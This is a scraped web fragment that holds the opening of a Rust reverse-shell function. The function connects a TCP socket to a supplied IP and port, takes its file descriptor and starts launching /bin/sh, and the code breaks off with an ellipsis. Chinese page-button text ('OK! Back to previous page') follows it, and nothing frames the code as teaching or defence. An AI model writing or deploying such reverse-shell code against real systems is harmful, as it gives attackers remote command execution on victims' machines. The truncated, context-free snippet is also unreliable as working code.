fn reverse_shell(ip: &str, port: &str) { let s = TcpStream::connect((ip, port)).unwrap(); let fd = s.as_raw_fd(); Command::new("/bin/sh") ...
確定! 回上一頁